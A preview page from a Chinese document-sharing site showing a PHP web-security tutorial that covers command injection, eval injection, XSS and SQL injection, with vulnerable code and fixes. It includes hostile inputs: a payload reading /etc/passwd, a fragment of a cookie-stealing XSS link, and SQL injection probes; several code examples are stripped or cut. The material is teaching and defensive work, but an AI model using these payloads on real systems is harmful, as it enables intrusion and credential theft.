ImageVerifierCode 换一换
格式:DOCX , 页数:23 ,大小:36.17KB ,
资源ID:8990644      下载积分:10 金币
快捷注册下载
登录下载
邮箱/手机:
温馨提示:
快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。 如填写123,账号就是123,密码也是123。
特别说明:
请自助下载,系统不会自动发送文件的哦; 如果您已付费,想二次下载,请登录后访问:我的下载记录
支付方式: 支付宝    微信支付   
验证码:   换一换

开通VIP
 

温馨提示:由于个人手机设置不同,如果发现不能下载,请复制以下地址【https://www.zixin.com.cn/docdown/8990644.html】到电脑端继续下载(重复下载【60天内】不扣币)。

已注册用户请登录:
账号:
密码:
验证码:   换一换
  忘记密码?
三方登录: 微信登录   QQ登录  

开通VIP折扣优惠下载文档

            查看会员权益                  [ 下载后找不到文档?]

填表反馈(24小时):  下载求助     关注领币    退款申请

开具发票请登录PC端进行申请

   平台协调中心        【在线客服】        免费申请共赢上传

权利声明

1、咨信平台为文档C2C交易模式,即用户上传的文档直接被用户下载,收益归上传人(含作者)所有;本站仅是提供信息存储空间和展示预览,仅对用户上传内容的表现方式做保护处理,对上载内容不做任何修改或编辑。所展示的作品文档包括内容和图片全部来源于网络用户和作者上传投稿,我们不确定上传用户享有完全著作权,根据《信息网络传播权保护条例》,如果侵犯了您的版权、权益或隐私,请联系我们,核实后会尽快下架及时删除,并可随时和客服了解处理情况,尊重保护知识产权我们共同努力。
2、文档的总页数、文档格式和文档大小以系统显示为准(内容中显示的页数不一定正确),网站客服只以系统显示的页数、文件格式、文档大小作为仲裁依据,个别因单元格分列造成显示页码不一将协商解决,平台无法对文档的真实性、完整性、权威性、准确性、专业性及其观点立场做任何保证或承诺,下载前须认真查看,确认无误后再购买,务必慎重购买;若有违法违纪将进行移交司法处理,若涉侵权平台将进行基本处罚并下架。
3、本站所有内容均由用户上传,付费前请自行鉴别,如您付费,意味着您已接受本站规则且自行承担风险,本站不进行额外附加服务,虚拟产品一经售出概不退款(未进行购买下载可退充值款),文档一经付费(服务费)、不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
4、如你看到网页展示的文档有www.zixin.com.cn水印,是因预览和防盗链等技术需要对页面进行转换压缩成图而已,我们并不对上传的文档进行任何编辑或修改,文档下载后都不会有水印标识(原文档上传前个别存留的除外),下载后原文更清晰;试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓;PPT和DOC文档可被视为“模板”,允许上传人保留章节、目录结构的情况下删减部份的内容;PDF文档不管是原文档转换或图片扫描而得,本站不作要求视为允许,下载前可先查看【教您几个在下载文档中可以更好的避免被坑】。
5、本文档所展示的图片、画像、字体、音乐的版权可能需版权方额外授权,请谨慎使用;网站提供的党政主题相关内容(国旗、国徽、党徽--等)目的在于配合国家政策宣传,仅限个人学习分享使用,禁止用于任何广告和商用目的。
6、文档遇到问题,请及时联系平台进行协调解决,联系【微信客服】、【QQ客服】,若有其他问题请点击或扫码反馈【服务填表】;文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“【版权申诉】”,意见反馈和侵权处理邮箱:1219186828@qq.com;也可以拔打客服电话:0574-28810668;投诉电话:18658249818。

注意事项

本文(我学院-PHP漏洞全解析.docx)为本站上传会员【仙人****88】主动上传,咨信网仅是提供信息存储空间和展示预览,仅对用户上传内容的表现方式做保护处理,对上载内容不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知咨信网(发送邮件至1219186828@qq.com、拔打电话4009-655-100或【 微信客服】、【 QQ客服】),核实后会尽快下架及时删除,并可随时和客服了解处理情况,尊重保护知识产权我们共同努力。
温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载【60天内】不扣币。 服务填表

我学院-PHP漏洞全解析.docx

1、 学IT技能上我学院网 PHP漏洞全解析 针对 PHP 的网站主要存在下面几种攻击方式: 1、命令注入(Command Injection) 2、eval 注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、跨网站脚本攻击(Cross Site Scripting, XSS) 5、SQL 注入攻击(SQL injection) 6、跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF) 7、Session 会话劫持(Session Hijacking) 8、Session 固定攻击(Sess

2、ion Fixation) 9、HTTP 响应拆分攻击(HTTP ResponseSplitting) 10、文件上传漏洞(File Upload Attack) 11 、目录穿越漏洞(Directory Traversal) 12、远程文件包含攻击(Remote Inclusion) 13、动态函数注入攻击(Dynamic Variable Evaluation) 14、URL 攻击(URL attack) 15、表单提交欺骗攻击(Spoofed Form Submissions) 16、HTTP 请求欺骗攻击(Spoofed HTTP Requests) 以后的每期连载,

3、会逐个介绍这些漏洞的原理和防御方法。 几个重要的 php.ini 选项 Register Globals php>=4.2.0,php.ini 的 register_globals 选项的默认值预设为 Off,当 register_globals 的设定 为 On 时,程序可以接收来自服务器的各种环境变量,包括表单提交的变量,而且由于 PHP 不必事先初始化变量的值,从而导致很大的安全隐患。 例 1: //check_admin()用于检查当前用户权限,如果是 admin 设置$is_admin 变量为 true,然后下面 判断此变量是否为 true,然后执行管理的一些操作

4、//ex1.php 这一段代码没有将$is_admin 事先初始化为 Flase,如果 register_globals 为 On,那么我们直 接提交 check_admin()的验证 例 2: //ex2.php

5、 ?> 当 register_globals=On 时 , 我 们 提 交 所以不管 register_globals 为什么,我们都要记住,对于任何传输的数据要经过仔细验证,变 量要初始化 safe_mode 安全模式,PHP 用来限制文档的存取、限制环境变量的存取,控制外部程序的执行。启用 安全模式必须设置 php.ini 中的 safe_mode = On 1、限制文件存取 safe_mode_include_dir = "/path1:/path2:/path3" 不同的文件夹用冒号隔开 2、限制环境变量的存取 safe_mode_allowed_env_v

6、ars = string 指定 PHP 程序可以改变的环境变量的前缀,如:safe_mode_allowed_env_vars = PHP_ , 当这个 选项的值为空时,那么 php 可以改变任何环境变量 safe_mode_protected_env_vars = string 用来指定 php 程序不可改变的环境变量的前缀 3、限制外部程序的执行 safe_mode_exec_dir = string 此选项指定的文件夹路径影响 system、exec、popen、passthru,不影响 shell_exec 和“` `”。 disable_functions = str

7、ing 不同的函数名称用逗号隔开,此选项不受安全模式影响 magic quotes 用来让 php 程序的输入信息自动转义,所有的单引号(“'”),双引号(“"”),反斜杠(“\”)和空字 符(NULL),都自动被加上反斜杠进行转义 magic_quotes_gpc = On 用来设置 magic quotes 为 On,它会影响 HTTP 请求的数据(GET、 POST、Cookies) 程序员也可以使用 addslashes 来转义提交的 HTTP 请求数据,或者用 stripslashes 来删除转义 PHP 漏洞全解(二)-命令注入攻击 命令注入攻击 PHP 中可以

8、使用下列 5 个函数来执行外部的应用程序或函数 system、exec、passthru、shell_exec、``(与 shell_exec 功能相同) 函数原型 string system(string command, int &return_var) command 要执行的命令 return_var 存放执行命令的执行后的状态值 string exec (string command, array &output, int &return_var) command 要执行的命令 output 获得执行命令输出的每一行字符串 return_var 存放执行命令后的状态

9、值 void passthru (string command, int &return_var) command 要执行的命令 return_var 存放执行命令后的状态值 string shell_exec (string command) command 要执行的命令 漏洞实例 例 1: //ex1.php "; system("ls -al ".$dir); echo ""; } ?> 我们提交 cat /etc/passw

10、d 提交以后,命令变成了 system("ls -al | cat /etc/passwd"); eval 注入攻击 eval 函数将输入的字符串参数当作 PHP 程序代码来执行 函数原型: mixed eval(string code_str)//eval 注入一般发生在攻击者能控制输入的字符串的时候 //ex2.php 当我们提

11、交 动态函数 程 序 员 原 意 是 想 动 态 调 用 A 和 B 函 数 , 那 我 们 提 交 漏洞产生 防范方法 1、尽量不要执行外部命令 2、使用自定义函数或函数库来替代外部命令的功能 3、使用 escapeshellarg 函数来处理命令参数 4、使用 safe_mode

12、exec_dir 指定可执行文件的路径 esacpeshellarg 函数会将任何引起参数或命令结束的字符转义,单引号“'”,替换成“ \' ”,双引 号“"”,替换成“\"”,分号“;”替换成“\;” 用 safe_mode_exec_dir 指定可执行文件的路径,可以把会使用的命令提前放入此路径内 safe_mode = On safe_mode_exec_di r= /usr/local/php/bin/ PHP 漏洞全解(三)-客户端脚本植入 客户端脚本植入(Script Insertion),是指将可以执行的脚本插入到表单、图片、动画或超链接 文字等对象内。当用户打

13、开这些对象后,攻击者所植入的脚本就会被执行,进而开始攻击。 可以被用作脚本植入的 HTML 标签一般包括以下几种: 1、 无限弹框 插入 跳转钓鱼页面 或者使用其他自行构造的 js 代码进行攻击 防范的方法 一般使用 htmlspecialchars 函

17、数来将特殊字符转换成 HTML 编码 函数原型 string htmlspecialchars (string string, int quote_style, string charset) string 是要编码的字符串 quote_style 可选 ,值可为 ENT_COMPAT、ENT_QUOTES 、ENT_NOQUOTES,默认值 ENT_COMPAT,表示只转换双引号不转换单引号。ENT_QUOTES,表示双引号和单引号都 要转换。ENT_NOQUOTES,表示双引号和单引号都不转换 charset 可选,表示使用的字符集 函数会将下列特殊字符转换成 html 编

18、码: & ----> & " ----> " ' ----> ' < ----> < > ----> > 把 show.php 的第 98 行改成 然后再查看插入 js 的漏洞页面 PHP 漏洞全解(四)-xss 跨站脚本攻击 XSS(Cross Site Scripting),意为跨网站脚本攻击,为了和样式表 css(Cascading Style Sheet)区 别,缩写为 XSS 跨站脚本

19、主要被攻击者利用来读取网站用户的 cookies 或者其他个人数据,一旦攻击者得到 这些数据,那么他就可以伪装成此用户来登录网站,获得此用户的权限。 跨站脚本攻击的一般步骤: 1、攻击者以某种方式发送 xss的 http 链接给目标用户 2、目标用户登录此网站,在登陆期间打开了攻击者发送的 xss链接 3、网站执行了此 xss攻击脚本 4、目标用户页面跳转到攻击者的网站,攻击者取得了目标用户的信息 5、攻击者使用目标用户的信息登录网站,完成攻击 当 有 存 在 跨 站 漏 洞 的 程 序 出 现 的 时 候 , 攻 击 者 可 以 构 造 类 似 kie.php?cook

20、ie='+document.cookie; ,诱骗用户点击后,可以获取用户 cookies 值 防范方法: 利用 htmlspecialchars 函数将特殊字符转换成 HTML 编码 函数原型 string htmlspecialchars (string string, int quote_style, string charset) string 是要编码的字符串 quote_style 可选 ,值可为 ENT_COMPAT、ENT_QUOTES 、ENT_NOQUOTES,默认值 ENT_COMPAT,表示只转换双引号不转换单引号。ENT_QUOTES,

21、表示双引号和单引号都 要转换。ENT_NOQUOTES,表示双引号和单引号都不转换 charset 可选,表示使用的字符集 函数会将下列特殊字符转换成 html 编码: & ----> & " ----> " ' ----> ' < ----> < > ----> > $_SERVER["PHP_SELF"]变量的跨站 在某个表单中,如果提交参数给自己,会用这样的语句

" method="POST"> ......

22、SERVER["PHP_SELF"]变量的值为当前页面名称 例: get.php 中上述的表单 那么我们提交 那么表单变成

" method="POST"> 跨站脚本被插进去了 防御方法还是使用 htmlspecialchars 过滤输出的变量,或者提交给自身文件的表单使用 这样直接避免了$_SERVER["PHP_SELF"]变量被跨站 PHP 漏洞全解(五)-SQL 注入

23、攻击 SQL 注入攻击(SQL Injection),是攻击者在表单中提交精心构造的 sql 语句,改变原来的 sql 语句,如果 web程序没有对提交的数据经过检查,那么就会造成 sql 注入攻击。 SQL 注入攻击的一般步骤: 1、攻击者访问有 SQL注入漏洞的网站,寻找注入点 2、攻击者构造注入语句,注入语句和程序中的 SQL语句结合生成新的 sql 语句 3、新的 sql 语句被提交到数据库中进行处理 4、数据库执行了新的 SQL语句,引发 SQL 注入攻击 实例 数据库 CREATE TABLE `postmessage` ( `id` int(11) NOT

24、NULL auto_increment, `subject` varchar(60) NOT NULL default '', `name` varchar(40) NOT NULL default '', `email` varchar(25) NOT NULL default '', `question` mediumtext NOT NULL, `postdate` datetime NOT NULL default '0000-00-00 00:00:00', PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=gb231

25、2 COMMENT=' 使 用 者 的 留 言 ' AUTO_INCREMENT=69 ; grant all privileges on ch3.* to 'sectop'@localhost identified by '123456'; //add.php 插入留言 //list.php 留言列表 //show.php 显示留言 程序和数据库打包下载地址 点我下载 页面 可能存在注入点,我们来测试 and 1=1 返回页面 提交 and 1=2 返回页面 一次查询到记录,一次没有,我们来看看源码 //show.php 12-15 行 // 执行 mys

26、ql 查询语句 $query = "select * from postmessage whereid = ".$_GET["id"]; $result = mysql_query($query) or die("执行 ySQL 查询语句失败:" . mysql_error()); 参数 id 传递进来后,和前面的字符串结合的 sql 语句放入数据库进行查询 提交 and 1=1,语句变成 select * from postmessage whereid = 71 and 1=1 这语句前值后值都 为真,and 以后也为真,返回查询到的数据 提交 and 1=2,语句变成 se

27、lect * from postmessagewhereid = 71 and 1=2 这语句前值为真, 后值为假,and 以后为假,查询不到任何数据 正常的 SQL查询,经过我们构造的语句之后,形成了 SQL 注入攻击。通过这个注入点,我 们还可以进一步拿到权限,比如说利用 union 读取管理密码,读取数据库信息,或者用 mysql 的 load_file,into outfile 等函数进一步渗透。 防范方法 整型参数: 使用 intval 函数将数据转换成整数 函数原型 int intval(mixed var, int base) var 是要转换成整形的变量

28、base,可选,是基础数,默认是 10 浮点型参数: 使用 floatval 或 doubleval 函数分别转换单精度和双精度浮点型参数 函数原型 int floatval(mixed var) var 是要转换的变量 int doubleval(mixed var) var 是要转换的变量 字符型参数: 使用 addslashes 函数来将单引号“'”转换成“ \' ”,双引号“"”转换成“\"”,反斜杠“\”转换成“\\” , NULL 字符加上反斜杠“\” 函数原型 string addslashes (string str) str 是要检查的字符串 那么

29、刚才出现的代码漏洞,我们可以这样修补 // 执行 mysql 查询语句 $query = "select * from postmessage whereid = ".intval($_GET["id"]); $result = mysql_query($query) or die("执行 ySQL 查询语句失败:" . mysql_error()); 如果是字符型,先判断 magic_quotes_gpc是否为 On,当不为 On 的时候使用 addslashes 转义 特殊字符 if(get_magic_quotes_gpc()) { $var = $_GET["var"]; } else { $var = addslashes($_GET["var"]); } 再次测试,漏洞已经修补 Unity3D|Cocos|php|HTML5|Java|ios|Android|C#|AS3|PS|UI|3Dmax|Python|MySQL|VR|AR

移动网页_全站_页脚广告1

关于我们      便捷服务       自信AI       AI导航        抽奖活动

©2010-2025 宁波自信网络信息技术有限公司  版权所有

客服电话:0574-28810668  投诉电话:18658249818

gongan.png浙公网安备33021202000488号   

icp.png浙ICP备2021020529号-1  |  浙B2-20240490  

关注我们 :微信公众号    抖音    微博    LOFTER 

客服